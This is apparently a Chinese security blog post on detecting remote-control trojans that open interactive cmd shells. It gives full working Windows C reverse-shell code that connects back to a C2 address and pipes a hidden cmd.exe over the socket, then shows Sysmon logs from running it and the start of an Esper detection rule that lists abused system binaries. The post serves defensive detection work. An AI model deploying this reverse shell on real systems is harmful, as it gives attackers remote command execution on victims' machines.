{"id":825,"date":"2021-07-23T15:35:31","date_gmt":"2021-07-23T07:35:31","guid":{"rendered":"http:\/\/weizn.net\/?p=825"},"modified":"2021-08-24T13:59:59","modified_gmt":"2021-08-24T05:59:59","slug":"%e9%80%9a%e7%94%a8%e6%a8%a1%e5%9e%8b%e6%a3%80%e6%b5%8b%e8%bf%9c%e6%8e%a7%e6%9c%a8%e9%a9%ac%e6%89%a7%e8%a1%8c%e4%ba%a4%e4%ba%92%e5%bc%8fcmdshell","status":"publish","type":"post","link":"http:\/\/weizn.net\/?p=825","title":{"rendered":"\u901a\u7528\u6a21\u578b\u68c0\u6d4b\u8fdc\u63a7\u6728\u9a6c\u6267\u884c\u4ea4\u4e92\u5f0fcmdshell"},"content":{"rendered":"<div id=\"ez-toc-container\" class=\"ez-toc-v2_0_17 counter-hierarchy\">\n<div class=\"ez-toc-title-container\">\n<p class=\"ez-toc-title\">\u76ee\u5f55<\/p>\n<span class=\"ez-toc-title-toggle\"><a class=\"ez-toc-pull-right ez-toc-btn ez-toc-btn-xs ez-toc-btn-default ez-toc-toggle\" style=\"display: none;\"><i class=\"ez-toc-glyphicon ez-toc-icon-toggle\"><\/i><\/a><\/span><\/div>\n<nav><ul class=\"ez-toc-list ez-toc-list-level-1\"><li class=\"ez-toc-page-1 ez-toc-heading-level-1\"><a class=\"ez-toc-link ez-toc-heading-1\" href=\"http:\/\/weizn.net\/?p=825\/#%E4%B8%80%E3%80%81%E4%BA%A4%E4%BA%92%E5%BC%8Fcmdshell%E7%9A%84%E5%AE%9E%E7%8E%B0\" title=\"\u4e00\u3001\u4ea4\u4e92\u5f0fcmdshell\u7684\u5b9e\u73b0\">\u4e00\u3001\u4ea4\u4e92\u5f0fcmdshell\u7684\u5b9e\u73b0<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-1\"><a class=\"ez-toc-link ez-toc-heading-2\" href=\"http:\/\/weizn.net\/?p=825\/#%E4%BA%8C%E3%80%81Sysmon%E6%97%A5%E5%BF%97%E5%88%86%E6%9E%90\" title=\"\u4e8c\u3001Sysmon\u65e5\u5fd7\u5206\u6790\">\u4e8c\u3001Sysmon\u65e5\u5fd7\u5206\u6790<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-1\"><a class=\"ez-toc-link ez-toc-heading-3\" href=\"http:\/\/weizn.net\/?p=825\/#%E4%B8%89%E3%80%81%E7%AD%96%E7%95%A5%E6%9E%84%E5%BB%BA\" title=\"\u4e09\u3001\u7b56\u7565\u6784\u5efa\">\u4e09\u3001\u7b56\u7565\u6784\u5efa<\/a><ul class=\"ez-toc-list-level-3\"><li class=\"ez-toc-heading-level-3\"><ul class=\"ez-toc-list-level-3\"><li class=\"ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-4\" href=\"http:\/\/weizn.net\/?p=825\/#1%E3%80%81%E5%88%9B%E5%BB%BA%E6%97%B6%E9%97%B4%E7%AA%97%E5%8F%A3%E7%BC%93%E5%AD%98%E4%BA%8B%E4%BB%B6%E6%97%A5%E5%BF%97\" title=\"1\u3001\u521b\u5efa\u65f6\u95f4\u7a97\u53e3\u7f13\u5b58\u4e8b\u4ef6\u65e5\u5fd7\">1\u3001\u521b\u5efa\u65f6\u95f4\u7a97\u53e3\u7f13\u5b58\u4e8b\u4ef6\u65e5\u5fd7<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-5\" href=\"http:\/\/weizn.net\/?p=825\/#2%E3%80%81%E6%A3%80%E6%B5%8B%E9%80%9A%E8%BF%87%E7%BB%91%E5%AE%9A2%E4%B8%AA%E5%8C%BF%E5%90%8D%E7%AE%A1%E9%81%93%E6%89%A7%E8%A1%8C%E4%BA%A4%E4%BA%92%E5%BC%8F%E5%91%BD%E4%BB%A4\" title=\"2\u3001\u68c0\u6d4b\u901a\u8fc7\u7ed1\u5b9a2\u4e2a\u533f\u540d\u7ba1\u9053\u6267\u884c\u4ea4\u4e92\u5f0f\u547d\u4ee4\">2\u3001\u68c0\u6d4b\u901a\u8fc7\u7ed1\u5b9a2\u4e2a\u533f\u540d\u7ba1\u9053\u6267\u884c\u4ea4\u4e92\u5f0f\u547d\u4ee4<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-6\" href=\"http:\/\/weizn.net\/?p=825\/#3%E3%80%81%E5%85%B3%E8%81%94%E7%BD%91%E7%BB%9C%E4%BA%8B%E4%BB%B6%E7%A1%AE%E5%AE%9A%E8%BF%9C%E6%8E%A7%E8%BF%9B%E7%A8%8B\" title=\"3\u3001\u5173\u8054\u7f51\u7edc\u4e8b\u4ef6\u786e\u5b9a\u8fdc\u63a7\u8fdb\u7a0b\">3\u3001\u5173\u8054\u7f51\u7edc\u4e8b\u4ef6\u786e\u5b9a\u8fdc\u63a7\u8fdb\u7a0b<\/a><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-3\"><a class=\"ez-toc-link ez-toc-heading-7\" href=\"http:\/\/weizn.net\/?p=825\/#4%E3%80%81%E8%AF%AF%E6%8A%A5%E6%83%85%E5%86%B5\" title=\"4\u3001\u8bef\u62a5\u60c5\u51b5\">4\u3001\u8bef\u62a5\u60c5\u51b5<\/a><\/li><\/ul><\/li><\/ul><\/li><li class=\"ez-toc-page-1 ez-toc-heading-level-1\"><a class=\"ez-toc-link ez-toc-heading-8\" href=\"http:\/\/weizn.net\/?p=825\/#%E5%9B%9B%E3%80%81%E5%90%8E%E8%AF%9D\" title=\"\u56db\u3001\u540e\u8bdd\">\u56db\u3001\u540e\u8bdd<\/a><\/li><\/ul><\/nav><\/div>\n<p>\u5bf9\u4e8e\u5927\u90e8\u5206\u8fdc\u63a7\uff0c\u5305\u62ec\u5546\u4e1a\/\u5f00\u6e90\/\u81ea\u7814\uff0c\u90fd\u63d0\u4f9b\u4ea4\u4e92\u5f0fcmdshell\u547d\u4ee4\u6267\u884c\u529f\u80fd\uff0c\u5e76\u4e14\u7ea2\u961f\u5728\u5185\u7f51\u62ff\u5230\u9a7b\u70b9\u7684\u540e\u6e17\u900f\u8fc7\u7a0b\u4e2d\uff0c\u4e5f\u6bd4\u8f83\u70ed\u8877\u4e8e\u4f7f\u7528\u8fd9\u4e2a\u529f\u80fd\uff0c\u5982\u679c\u76d1\u63a7\u8fd9\u7c7b\u573a\u666f\uff0c\u5c06\u6781\u5927\u63d0\u5347\u5165\u4fb5\u68c0\u51fa\u7387\u3002<\/p>\n<p>&nbsp;<\/p>\n<h1><span class=\"ez-toc-section\" id=\"%E4%B8%80%E3%80%81%E4%BA%A4%E4%BA%92%E5%BC%8Fcmdshell%E7%9A%84%E5%AE%9E%E7%8E%B0\"><\/span>\u4e00\u3001\u4ea4\u4e92\u5f0fcmdshell\u7684\u5b9e\u73b0<span class=\"ez-toc-section-end\"><\/span><\/h1>\n<p>\u7531\u4e8e\u8fdc\u63a7\u4e2d\u4ea4\u4e92\u5f0fshell\u539f\u7406\u548c\u53cd\u5f39shell\u57fa\u672c\u4e00\u81f4\uff0c\u4e3a\u4e86\u7b80\u5316\u5206\u6790\uff0c\u4ee5\u4e0b\u5c06\u7528\u53cd\u5f39shell\u7684\u5b9e\u73b0\u65b9\u5f0f\u63cf\u8ff0\uff0c\u4e00\u822c\u8fc7\u7a0b\u4e3a\uff1a<\/p>\n<p><span style=\"color: #ff6600;\">\u521b\u5efasocket &#8212;&gt; \u5efa\u7acb\u5230C2\u670d\u52a1\u5668\u7684\u8fde\u63a5 &#8212;&gt; \u521b\u5efa2\u4e2a\u5355\u5411\u533f\u540d\u7ba1\u9053 &#8212;&gt; \u521b\u5efacmd.exe\u5b50\u8fdb\u7a0b &#8212;&gt; \u5206\u522b\u5728\u57fa\u672c\u8f93\u5165\u8f93\u51fa\u6d41\u4e0a\u7ed1\u5b9a2\u4e2a\u533f\u540d\u7ba1\u9053 &#8212;&gt; \u6267\u884ccmd.exe\u5b50\u8fdb\u7a0b &#8212;&gt; \u4ece\u7ba1\u9053\u4e2d\u5faa\u73af\u8bfb\u53d6\u548c\u5199\u5165<\/span><\/p>\n<p>\u5b9e\u73b0\u7684C\u4ee3\u7801\u5982\u4e0b\uff1a<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\">\/*\r\n@Time    : 2015-03-19 18:32\r\n@Author  : weizinan\r\n@File    : main.c\r\n@Version : 1.0\r\n*\/\r\n\r\n#include &lt;stdio.h&gt;\r\n#include &lt;stdlib.h&gt;\r\n#include &lt;winsock2.h&gt;\r\n#include &lt;windows.h&gt;\r\n\r\n#pragma comment(lib,\"ws2_32.lib\")\r\n\r\n#define SOCK_BUFF_SIZE 2048\r\n\r\nenum _bind_cmd_ret_\r\n{\r\n    BIND_CMD_NORMAL = 0,\r\n    BIND_CMD_ERR_CREATE_PIPE,\r\n    BIND_CMD_ERR_RECV,\r\n    BIND_CMD_ERR_SEND,\r\n    BIND_CMD_ERR_WR_PIPE,\r\n    BIND_CMD_ERR_RD_PIPE,\r\n};\r\nint bind_cmd_proc(SOCKET soc)\r\n{\r\n    HANDLE hReadPipe1, hWritePipe1, hReadPipe2, hWritePipe2;       \/\/\u4e24\u4e2a\u533f\u540d\u7ba1\u9053\r\n    SECURITY_ATTRIBUTES sa;\r\n    STARTUPINFO si;\r\n    PROCESS_INFORMATION pi;\r\n    fd_set rdSet, wrSet;\r\n    struct timeval timeoVal;\r\n    char sendBuff[SOCK_BUFF_SIZE];\r\n    char recvBuff[SOCK_BUFF_SIZE];\r\n    int recvLen = 0;\r\n    unsigned long lBytesRead = 0;\r\n\r\n    memset(&amp;si, NULL, sizeof(STARTUPINFO));\r\n    memset(&amp;sa, NULL, sizeof(SECURITY_ATTRIBUTES));\r\n    memset(&amp;pi, NULL, sizeof(PROCESS_INFORMATION));\r\n\r\n    \/\/\u521b\u5efa\u4e24\u4e2a\u533f\u540d\u7ba1\u9053\r\n    sa.nLength = sizeof(sa);\r\n    sa.lpSecurityDescriptor = 0;\r\n    sa.bInheritHandle = TRUE;\r\n    if (!CreatePipe(&amp;hReadPipe1, &amp;hWritePipe1, &amp;sa, 0))\r\n        return BIND_CMD_ERR_CREATE_PIPE;\r\n    if (!CreatePipe(&amp;hReadPipe2, &amp;hWritePipe2, &amp;sa, 0))\r\n        return BIND_CMD_ERR_CREATE_PIPE;\r\n\r\n    \/\/\u7528\u7ba1\u9053\u4e0ecmd.exe\u7ed1\u5b9a\r\n    GetStartupInfo(&amp;si);\r\n    si.cb = sizeof(si);\r\n    si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;\r\n    si.wShowWindow = SW_HIDE;\r\n    si.hStdInput = hReadPipe1;\r\n    si.hStdOutput = si.hStdError = hWritePipe2;\r\n    CreateProcess(NULL, (LPSTR)\"cmd.exe\", NULL, NULL, 1, NULL, NULL, NULL, &amp;si, &amp;pi);\r\n\r\n    \/\/roll select\r\n    while (1)\r\n    {\r\n        timeoVal.tv_sec = 0;\r\n        timeoVal.tv_usec = 100;\r\n        FD_ZERO(&amp;rdSet);\r\n        FD_ZERO(&amp;wrSet);\r\n        FD_SET(soc, &amp;rdSet);\r\n        memset(recvBuff, NULL, sizeof(recvBuff));\r\n        memset(sendBuff, NULL, sizeof(sendBuff));\r\n\r\n        if (select(-1, &amp;rdSet, NULL, NULL, &amp;timeoVal) &gt; 0)\r\n        {\r\n            \/\/recv from socket\r\n            if (FD_ISSET(soc, &amp;rdSet))\r\n            {\r\n                if ((recvLen = recv(soc, recvBuff, sizeof(recvBuff) - 1, 0)) &lt;= 0)\r\n                {\r\n                    closesocket(soc);\r\n                    TerminateProcess(pi.hProcess, -1);\r\n                    CloseHandle(pi.hProcess);\r\n                    CloseHandle(pi.hThread);\r\n                    CloseHandle(hReadPipe1);\r\n                    CloseHandle(hWritePipe1);\r\n                    CloseHandle(hReadPipe2);\r\n                    CloseHandle(hWritePipe2);\r\n                    return BIND_CMD_ERR_RECV;\r\n                }\r\n\r\n                \/\/write to pipe\r\n                if (!WriteFile(hWritePipe1, recvBuff, strlen(recvBuff), &amp;lBytesRead, 0))\r\n                {\r\n                    closesocket(soc);\r\n                    TerminateProcess(pi.hProcess, -1);\r\n                    CloseHandle(pi.hProcess);\r\n                    CloseHandle(pi.hThread);\r\n                    CloseHandle(hReadPipe1);\r\n                    CloseHandle(hWritePipe1);\r\n                    CloseHandle(hReadPipe2);\r\n                    CloseHandle(hWritePipe2);\r\n                    return BIND_CMD_ERR_WR_PIPE;\r\n                }\r\n            }\r\n        }\r\n        else\r\n        {\r\n            if (PeekNamedPipe(hReadPipe2, recvBuff, sizeof(recvBuff) - 1, &amp;lBytesRead, 0, 0) &amp;&amp; lBytesRead &gt; 0)\r\n            {\r\n                \/\/read from cmd.exe\r\n                if (!ReadFile(hReadPipe2, recvBuff, sizeof(recvBuff) - 1, &amp;lBytesRead, 0))\r\n                {\r\n                    closesocket(soc);\r\n                    TerminateProcess(pi.hProcess, -1);\r\n                    CloseHandle(pi.hProcess);\r\n                    CloseHandle(pi.hThread);\r\n                    CloseHandle(hReadPipe1);\r\n                    CloseHandle(hWritePipe1);\r\n                    CloseHandle(hReadPipe2);\r\n                    CloseHandle(hWritePipe2);\r\n                    return BIND_CMD_ERR_RD_PIPE;\r\n                }\r\n\r\n                if (send(soc, recvBuff, strlen(recvBuff), 0) &lt;= 0)\r\n                {\r\n                    closesocket(soc);\r\n                    TerminateProcess(pi.hProcess, -1);\r\n                    CloseHandle(pi.hProcess);\r\n                    CloseHandle(pi.hThread);\r\n                    CloseHandle(hReadPipe1);\r\n                    CloseHandle(hWritePipe1);\r\n                    CloseHandle(hReadPipe2);\r\n                    CloseHandle(hWritePipe2);\r\n                    return BIND_CMD_ERR_SEND;\r\n                }\r\n            }\r\n        }\r\n    }\r\n\r\n    return BIND_CMD_NORMAL;\r\n}\r\n\r\nint init_socket()\r\n{\r\n    WSADATA wsa;\r\n\r\n    memset((char *)&amp;wsa, 0x00, sizeof(wsa));\r\n\r\n    if (WSAStartup(MAKEWORD(2, 2), &amp;wsa) != 0)\r\n        return -1;\r\n\r\n    return 0;\r\n}\r\n\r\nenum _conn_back_ret_\r\n{\r\n    CONN_BACK_NORMAL = 0,\r\n    CONN_BACK_ERR_INIT,\r\n    CONN_BACK_ERR_CREATE_SOC,\r\n    CONN_BACK_ERR_CONN,\r\n};\r\nint conn_back_to_server(char *servIP, unsigned short servPort)\r\n{\r\n    int retVal;\r\n    SOCKET soc;\r\n    struct sockaddr_in servAddr;\r\n\r\n    memset((char *)&amp;servAddr, 0x00, sizeof(servAddr));\r\n\r\n    servAddr.sin_family = AF_INET;\r\n    servAddr.sin_addr.s_addr = inet_addr(servIP);\r\n    servAddr.sin_port = htons(servPort);\r\n\r\n    if (init_socket() != 0)\r\n        return CONN_BACK_ERR_INIT;\r\n\r\n    if ((soc = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET)\r\n        return CONN_BACK_ERR_CREATE_SOC;\r\n\r\n    if (connect(soc, (struct sockaddr *)&amp;servAddr, sizeof(servAddr)) != 0)\r\n        return CONN_BACK_ERR_CONN;\r\n\r\n    retVal = bind_cmd_proc(soc);\r\n\r\n    return retVal;\r\n}\r\n\r\nint main()\r\n{\r\n\r\n    conn_back_to_server(\"172.18.249.206\", 4444);\r\n    return 0;\r\n}\r\n<\/pre>\n<p>\u4ea4\u4e92\u5f0f\u7684cmdshell\u88ab\u53cd\u5f39\u5230C2\u4e3b\u673a\u4e0a\uff1a<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-842\" title=\"017b37fe50a80246b3e609c6a042aecc\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/017b37fe50a80246b3e609c6a042aecc.png\" alt=\"017b37fe50a80246b3e609c6a042aecc\" width=\"529\" height=\"245\" srcset=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/017b37fe50a80246b3e609c6a042aecc.png 768w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/017b37fe50a80246b3e609c6a042aecc-585x271.png 585w\" sizes=\"auto, (max-width: 529px) 100vw, 529px\" \/><\/p>\n<p>&nbsp;<\/p>\n<h1><span class=\"ez-toc-section\" id=\"%E4%BA%8C%E3%80%81Sysmon%E6%97%A5%E5%BF%97%E5%88%86%E6%9E%90\"><\/span>\u4e8c\u3001Sysmon\u65e5\u5fd7\u5206\u6790<span class=\"ez-toc-section-end\"><\/span><\/h1>\n<p>\u542f\u52a8\u4ea4\u4e92\u5f0fshell\u540e\uff0c\u53d7\u5bb3\u8005\u4e3b\u673a\u4e0a\u4ea7\u751f\u4e0e\u6b64\u4e8b\u4ef6\u76f8\u5173\u7684Sysmon\u65e5\u5fd7\uff1a<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-845\" title=\"beeaabf3e227a162c778c658e760f9f0-2\" src=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/beeaabf3e227a162c778c658e760f9f0-2.png\" alt=\"beeaabf3e227a162c778c658e760f9f0-2\" width=\"544\" height=\"395\" srcset=\"http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/beeaabf3e227a162c778c658e760f9f0-2.png 1804w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/beeaabf3e227a162c778c658e760f9f0-2-768x558.png 768w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/beeaabf3e227a162c778c658e760f9f0-2-1536x1115.png 1536w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/beeaabf3e227a162c778c658e760f9f0-2-1170x850.png 1170w, http:\/\/weizn.net\/wp-content\/uploads\/2021\/08\/beeaabf3e227a162c778c658e760f9f0-2-585x425.png 585w\" sizes=\"auto, (max-width: 544px) 100vw, 544px\" \/><\/p>\n<p>\u5173\u952e\u65e5\u5fd7\u8be6\u7ec6\uff1a<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"json\"># \u521b\u5efa\u533f\u540d\u7ba1\u9053\uff0cevent_id\uff1a17\r\n\"event_data\": {\r\n      \"EventType\": \"createpipe\",\r\n      \"PipeName\": \"&lt;anonymous pipe&gt;\",\r\n      \"ProcessId\": \"10060\",\r\n      \"Image\": \"c:\\\\users\\\\xxx\\\\desktop\\\\c_projects\\\\cmd_shell\\\\bin\\\\debug\\\\cmd_shell.exe\",\r\n      \"ProcessGuid\": \"{69cf656d-42f8-6123-7122-000000001500}\"\r\n    }<\/pre>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"json\"># \u8fde\u63a5\u533f\u540d\u7ba1\u9053\uff0cevent_id\uff1a18\r\n\"event_data\": {\r\n      \"EventType\": \"connectpipe\",\r\n      \"PipeName\": \"&lt;anonymous pipe&gt;\",\r\n      \"ProcessId\": \"10060\",\r\n      \"Image\": \"c:\\\\users\\\\xxx\\\\desktop\\\\c_projects\\\\cmd_shell\\\\bin\\\\debug\\\\cmd_shell.exe\",\r\n      \"ProcessGuid\": \"{69cf656d-42f8-6123-7122-000000001500}\"\r\n    }<\/pre>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\"># \u521b\u5efacmd.exe\u5b50\u8fdb\u7a0b\uff0cevent_id\uff1a1\r\n\"event_data\": {\r\n      \"ParentImage\": \"c:\\\\users\\\\xxx\\\\desktop\\\\c_projects\\\\cmd_shell\\\\bin\\\\debug\\\\cmd_shell.exe\",\r\n      \"Company\": \"microsoft corporation\",\r\n      \"LogonGuid\": \"{69cf656d-b3e8-6114-c5bf-100000000000}\",\r\n      \"Description\": \"windows command processor\",\r\n      \"OriginalFileName\": \"cmd.exe\",\r\n      \"TerminalSessionId\": \"1\",\r\n      \"IntegrityLevel\": \"medium\",\r\n      \"ParentProcessId\": \"10060\",\r\n      \"Product\": \"microsoft\u00ae windows\u00ae operating system\",\r\n      \"Image\": \"c:\\\\windows\\\\system32\\\\cmd.exe\",\r\n      \"ProcessGuid\": \"{69cf656d-42f8-6123-7222-000000001500}\",\r\n      \"FileVersion\": \"10.0.19041.746 (winbuild.160101.0800)\",\r\n      \"ParentCommandLine\": \"c:\\\\users\\\\xxx\\\\desktop\\\\c_projects\\\\cmd_shell\\\\bin\\\\debug\\\\cmd_shell.exe \",\r\n      \"LogonId\": \"0x10bfc5\",\r\n      \"CommandLine_Raw\": \"cmd.exe\",\r\n      \"ParentCommandLine_Raw\": \"C:\\\\Users\\\\xxx\\\\Desktop\\\\c_projects\\\\cmd_shell\\\\bin\\\\Debug\\\\cmd_shell.exe \",\r\n      \"CommandLine\": \"cmd.exe\",\r\n      \"ProcessId\": \"10104\",\r\n      \"ParentProcessGuid\": \"{69cf656d-42f8-6123-7122-000000001500}\",\r\n    }<\/pre>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\"># \u8bbf\u95eecmd.exe\u5b50\u8fdb\u7a0b\u7ed1\u5b9a\u7ba1\u9053\uff0cevent_id\uff1a10\r\n\"event_data\": {\r\n      \"GrantedAccess\": \"0x1fffff\",\r\n      \"SourceImage\": \"c:\\\\users\\\\xxx\\\\desktop\\\\c_projects\\\\cmd_shell\\\\bin\\\\debug\\\\cmd_shell.exe\",\r\n      \"TargetImageDescription\": \"windows command processor\",\r\n      \"TargetImageOriginalFileName\": \"cmd.exe\",\r\n      \"SourceProcessId\": \"10060\",\r\n      \"SourceProcessGUID\": \"{69cf656d-42f8-6123-7122-000000001500}\",\r\n      \"UtcTime\": \"2021-08-23 06:40:56.783\",\r\n      \"TargetProcessId\": \"10104\",\r\n      \"SourceThreadId\": \"11216\",\r\n      \"TargetImage\": \"c:\\\\windows\\\\system32\\\\cmd.exe\",\r\n      \"TargetProcessGUID\": \"{69cf656d-42f8-6123-7222-000000001500}\",\r\n    }<\/pre>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"json\"># \u53d1\u8d77\u5bf9C2\u5730\u5740\u7684\u7f51\u7edc\u94fe\u63a5\uff0cevent_id\uff1a3\r\n\"event_data\": {\r\n      \"SourcePort\": 62093,\r\n      \"Image\": \"c:\\\\users\\\\xxx\\\\desktop\\\\c_projects\\\\cmd_shell\\\\bin\\\\debug\\\\cmd_shell.exe\",\r\n      \"DestinationPort\": 4444,\r\n      \"ProcessGuid\": \"{69cf656d-42f8-6123-7122-000000001500}\",\r\n      \"DestinationIp\": \"172.18.249.206\",\r\n      \"Initiated\": \"true\",\r\n      \"SourceIp\": \"192.168.162.225\",\r\n      \"SourceIsIpv6\": \"false\",\r\n      \"DestinationIsIpv6\": \"false\",\r\n      \"ProcessId\": \"10060\",\r\n      \"Protocol\": \"tcp\",\r\n      \"direction\": \"outbound\",\r\n      \"md5\": \"579f8566e1db5a9831b317eb9f4d4555\"\r\n    }<\/pre>\n<p>\u901a\u8fc7\u4ee5\u4e0a\u65e5\u5fd7\uff0c\u53ef\u4ee5\u68b3\u7406\u51fa\u66f4\u8be6\u7ec6\u7684\u6267\u884c\u8fc7\u7a0b\uff1a<\/p>\n<p><span style=\"color: #ff6600;\">\u8fdb\u7a0b\u5728\u65f6\u95f4\u5e8f\u5217\u4e0a\u4f9d\u6b21\u89e6\u53d1Sysmon\u65e5\u5fd7ID\uff1a 3\uff08\u4e3b\u52a8\u53d1\u8d77\u5bf9\u5916\u7f51\u7edc\u8fde\u63a5\uff09-&gt; 17\uff08\u521b\u5efa\u533f\u540d\u7ba1\u9053\uff09-&gt; 18\uff08\u8fde\u63a5\u8f93\u5165\u7ba1\u9053\uff09-&gt; 17\uff08\u521b\u5efa\u533f\u540d\u7ba1\u9053\uff09-&gt; 18\uff08\u8fde\u63a5\u8f93\u51fa\u7ba1\u9053\uff09-&gt; 1\uff08\u542f\u52a8\u5b50\u8fdb\u7a0b\u5e76\u6267\u884c\u547d\u4ee4\uff09-&gt; 10\uff08\u6253\u5f00\u5b50\u8fdb\u7a0b\u7ed1\u5b9a\u57fa\u672cI\/O\u6d41\uff09<\/span><\/p>\n<p>&nbsp;<\/p>\n<h1><span class=\"ez-toc-section\" id=\"%E4%B8%89%E3%80%81%E7%AD%96%E7%95%A5%E6%9E%84%E5%BB%BA\"><\/span>\u4e09\u3001\u7b56\u7565\u6784\u5efa<span class=\"ez-toc-section-end\"><\/span><\/h1>\n<p>\u603b\u7ed3\u51fa\u884c\u4e3a\u5728\u65e5\u5fd7\u4e2d\u7684\u8868\u8fbe\u540e\uff0c\u5373\u53ef\u5c1d\u8bd5\u7f16\u5199CEP\u89c4\u5219\uff0c\u4e0d\u540c\u7684CEP\u5f15\u64ce\u89c4\u5219\u7f16\u5199\u65b9\u5f0f\u4e0d\u540c\uff0c\u4f8b\u5982<a href=\"http:\/\/weizn.net\/?p=667\">CEP\u5f15\u64ceESPER\u5728\u5165\u4fb5\u68c0\u6d4b\u7cfb\u7edf\u4e2d\u7684\u5b9e\u8df5<\/a>\uff0c\u5bf9\u4e8e\u6b64\u4e8b\u4ef6\u63cf\u8ff0\u7684EPL\u8bed\u53e5\u53ef\u53c2\u8003\u5982\u4e0b\u3002<\/p>\n<h3><span class=\"ez-toc-section\" id=\"1%E3%80%81%E5%88%9B%E5%BB%BA%E6%97%B6%E9%97%B4%E7%AA%97%E5%8F%A3%E7%BC%93%E5%AD%98%E4%BA%8B%E4%BB%B6%E6%97%A5%E5%BF%97\"><\/span>1\u3001\u521b\u5efa\u65f6\u95f4\u7a97\u53e3\u7f13\u5b58\u4e8b\u4ef6\u65e5\u5fd7<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p>\u4e0d\u4ec5\u4ec5\u76d1\u63a7cmd.exe\uff0c\u540c\u65f6\u9700\u8981\u76d1\u63a7powershell.exe\uff0c\u751a\u81f3\u9ed1\u5ba2\u53ef\u80fd\u7ed5\u8fc7\u7ec8\u7aef\u7a0b\u5e8f\u76f4\u63a5\u548c\u76f8\u5173\u547d\u4ee4\u7ed1\u5b9a\u7ba1\u9053\uff0c\u6b64\u5916\u8fd8\u6709python.exe\u7b49\u811a\u672c\u89e3\u91ca\u63a7\u5236\u53f0\uff0c\u90fd\u5e94\u8be5\u5728\u8003\u8651\u8303\u56f4\u5185\uff1a<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"yaml\"># \u521b\u5efa\u7ed1\u5b9a\u533f\u540d\u7ba1\u9053\u6267\u884cCMD\u547d\u4ee4\u7684\u5168\u5c40\u7a97\u53e3\r\nepl: '\r\n@name(\"\u521b\u5efa\u7ed1\u5b9a\u533f\u540d\u7ba1\u9053\u6267\u884cCMD\u547d\u4ee4\u7684\u5168\u5c40\u7a97\u53e3_Sysmon_\u521b\u5efa\u4e34\u65f6\u7f13\u5b58\u7a97\u53e3\")\r\n@public\r\ncreate window dc9ska0wsa_win#groupwin(computer_name)#time(10 sec) as\r\nselect\r\n*\r\nfrom SysmonRawLogs;\r\n\r\n\r\n@name(\"\u521b\u5efa\u7ed1\u5b9a\u533f\u540d\u7ba1\u9053\u6267\u884cCMD\u547d\u4ee4\u7684\u5168\u5c40\u7a97\u53e3_Sysmon_\u521b\u5efa\u7a97\u53e3\u7d22\u5f15\")\r\ncreate index dc9ska0wsa_win_Index\r\non dc9ska0wsa_win (\r\n    computer_name hash,\r\n    event_id hash,\r\n    event_data_image hash,\r\n    event_data_sourceimage hash,\r\n    event_data_processguid hash,\r\n    event_data_sourceprocessguid hash,\r\n    event_data_processid hash,\r\n    event_data_sourceprocessid hash,\r\n    event_data_parentimage,\r\n    event_data_parentprocessguid,\r\n    event_data_parentprocessid\r\n);\r\n\r\n\r\n@name(\"\u521b\u5efa\u7ed1\u5b9a\u533f\u540d\u7ba1\u9053\u6267\u884cCMD\u547d\u4ee4\u7684\u5168\u5c40\u7a97\u53e3_Sysmon_\u5199\u5165\u7f13\u5b58\u6570\u636e\")\r\ninsert into dc9ska0wsa_win\r\nselect\r\n*\r\nfrom SysmonRawLogs\r\nwhere\r\n(\r\n  event_id in (\"17\", \"18\")\r\n  and event_data_pipename = \"&lt;anonymous pipe&gt;\"\r\n  and event_data_eventtype in (\"createpipe\", \"connectpipe\")\r\n)\r\nor\r\n(\r\n    event_id = \"1\"\r\n    and not StringUtils.wildcard_match(event_data_parentcommandline, \"*.ps1\")\r\n    and not StringUtils.wildcard_match(event_data_parentimage, \"*\\\\java.exe\")\r\n    and not StringUtils.wildcard_match(event_data_parentimage, \"*\\\\xshellcore.exe\")\r\n    and (\r\n        StringUtils.wildcard_match(event_data_image, \"*\\\\cmd.exe\")\r\n        or StringUtils.wildcard_match(event_data_image, \"*\\\\powershell.exe\")\r\n        or StringUtils.wildcard_match(event_data_image, \"*\\\\whoami.exe\")\r\n        or StringUtils.wildcard_match(event_data_image, \"*\\\\hostname.exe\")\r\n        or StringUtils.wildcard_match(event_data_image, \"*\\\\net.exe\")\r\n        or StringUtils.wildcard_match(event_data_image, \"*\\\\net1.exe\")\r\n        or StringUtils.wildcard_match(event_data_image, \"*\\\\systeminfo.exe\")\r\n        or StringUtils.wildcard_match(event_data_image, \"*\\\\wmic.exe\")\r\n        or StringUtils.wildcard_match(event_data_image, \"*\\\\regsvr32.exe\")\r\n        or StringUtils.wildcard_match(event_data_image, \"*\\\\bitsadmin.exe\")\r\n        or StringUtils.wildcard_match(event_data_image, \"*\\\\cmstp.exe\")\r\n        or StringUtils.wildcard_match(event_data_image, \"*\\\\mshta.exe\")\r\n        or StringUtils.wildcard_match(event_data_image, \"*\\\\certutil.exe\")\r\n        or StringUtils.wildcard_match(event_data_image, \"*\\\\rundll32.exe\")\r\n        or StringUtils.wildcard_match(event_data_image, \"*\\\\cscript.exe\")\r\n        or 